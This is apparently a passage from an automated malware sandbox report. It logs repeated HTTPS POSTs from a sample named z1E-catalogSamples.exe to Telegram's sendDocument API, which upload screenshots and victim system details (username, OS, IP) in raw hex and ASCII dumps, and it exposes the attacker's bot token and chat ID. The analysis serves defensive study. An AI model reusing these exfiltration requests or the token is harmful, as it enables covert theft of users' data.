                                                                  2024-04-19 17:34:14 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:34:14 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:34:14 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:34:14 UTC1558OUTData Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 00 4f ff 00 1e f2 7f ba 7f 95 7c f3 5f 41 cd 34 46 09 00 91 09 2a 7f 88 7a 57 cf 95 71 33 98 56 e6 99 e2 49 ec ec 7e c1 73 6b 05 fd 9e 77 2c 37 0b 90 a7 d4 1e df 85 61 d1 54 41 b9 a9 f8 92 7b cb 1f b0 5b 5a c1 61 67 9d cd 0d ba e0 31 f5 27 bf e3 58 74 51 40 05 14 51 4c 02 b5 ee 7c 4f ae 5c 5d 4b 3f f6 ad e4 5e 63 97 f2 e2 b8 75 45 c9 ce 14 67 80 3b 56
                                                                  Data Ascii: Q=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=SO|_A4F*zWq3VI~skw,7aTA{[Zag1'XtQ@QL|O\]K?^cuEg;V
                                                                  2024-04-19 17:34:14 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 31 64 33 35 64 31 37 38 34 63 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc641d35d1784c--
                                                                  2024-04-19 17:34:14 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:34:14 UTC1485INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:34:14 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3389,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548054,"document":{"file_name":"user-618321 2024-04-24 05-12-59.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg09ZiKrFuU3wQABBBDHVD8ReyDOBjl1AAKtFwACi1IZUYHvec-2_rA0AQAHbQADNAQ","file_unique_id":"AQADrRcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg09ZiKrFuU3wQABBBDHVD8ReyDOBjl1AAKtFwACi1IZUYHvec-2_rA0AQAHbQADNAQ","file_unique_id":"AQADrRcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINPWYiqxblN8EAAQQQx1Q_EXsgzgY5dQACrRcAAotSGVGB73nPtv6wNDQE","file_unique_id":"AgADrRcAAotSGVE","file_size":66521},"caption":"New SC Recovered!\n\nTime: 04/24/2024 05:07:59\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.549719149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:34:35 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc6905e4c74819
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67144
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:34:35 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 39 30 35 65 34 63 37 34 38 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 39 30 35 65 34 63 37 34 38 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 33 30 2f 32 30 32 34 20 31 31 3a 30 38 3a 34 30 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc6905e4c74819Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6905e4c74819Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/30/2024 11:08:40User
                                                                  2024-04-19 17:34:35 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:34:35 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:34:35 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:34:35 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:34:35 UTC1558OUTData Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 00 4f ff 00 1e f2 7f ba 7f 95 7c f3 5f 41 cd 34 46 09 00 91 09 2a 7f 88 7a 57 cf 95 71 33 98 56 e6 99 e2 49 ec ec 7e c1 73 6b 05 fd 9e 77 2c 37 0b 90 a7 d4 1e df 85 61 d1 54 41 b9 a9 f8 92 7b cb 1f b0 5b 5a c1 61 67 9d cd 0d ba e0 31 f5 27 bf e3 58 74 51 40 05 14 51 4c 02 b5 ee 7c 4f ae 5c 5d 4b 3f f6 ad e4 5e 63 97 f2 e2 b8 75 45 c9 ce 14 67 80 3b 56
                                                                  Data Ascii: Q=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=SO|_A4F*zWq3VI~skw,7aTA{[Zag1'XtQ@QL|O\]K?^cuEg;V
                                                                  2024-04-19 17:34:35 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 39 30 35 65 34 63 37 34 38 31 39 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc6905e4c74819--
                                                                  2024-04-19 17:34:35 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:34:36 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:34:36 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3412,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548076,"document":{"file_name":"user-618321 2024-04-30 11-08-41.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg1UZiKrLDnbUIdgcmcpSX4fDVFbjYAAAq4XAAKLUhlRBZsefgJ4hMkBAAdtAAM0BA","file_unique_id":"AQADrhcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg1UZiKrLDnbUIdgcmcpSX4fDVFbjYAAAq4XAAKLUhlRBZsefgJ4hMkBAAdtAAM0BA","file_unique_id":"AQADrhcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINVGYiqyw521CHYHJnKUl-Hw1RW42AAAKuFwACi1IZUQWbHn4CeITJNAQ","file_unique_id":"AgADrhcAAotSGVE","file_size":66521},"caption":"New SC Recovered!\n\nTime: 04/30/2024 11:08:40\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.549720149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:34:58 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc6e654d78418e
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67144
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:34:58 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 36 35 34 64 37 38 34 31 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 65 36 35 34 64 37 38 34 31 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 30 37 2f 32 30 32 34 20 30 37 3a 30 39 3a 31 31 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc6e654d78418eContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc6e654d78418eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 05/07/2024 07:09:11User
                                                                  2024-04-19 17:34:58 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:34:58 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:34:58 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:34:58 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:34:58 UTC1558OUTData Raw: e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 01 25 15 1f 9f 0f fc f5 4f fb e8 51 e7 c3 ff 00 3d 53 fe fa 14 00 4f ff 00 1e f2 7f ba 7f 95 7c f3 5f 41 cd 34 46 09 00 91 09 2a 7f 88 7a 57 cf 95 71 33 98 56 e6 99 e2 49 ec ec 7e c1 73 6b 05 fd 9e 77 2c 37 0b 90 a7 d4 1e df 85 61 d1 54 41 b9 a9 f8 92 7b cb 1f b0 5b 5a c1 61 67 9d cd 0d ba e0 31 f5 27 bf e3 58 74 51 40 05 14 51 4c 02 b5 ee 7c 4f ae 5c 5d 4b 3f f6 ad e4 5e 63 97 f2 e2 b8 75 45 c9 ce 14 67 80 3b 56
                                                                  Data Ascii: Q=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=S%OQ=SO|_A4F*zWq3VI~skw,7aTA{[Zag1'XtQ@QL|O\]K?^cuEg;V
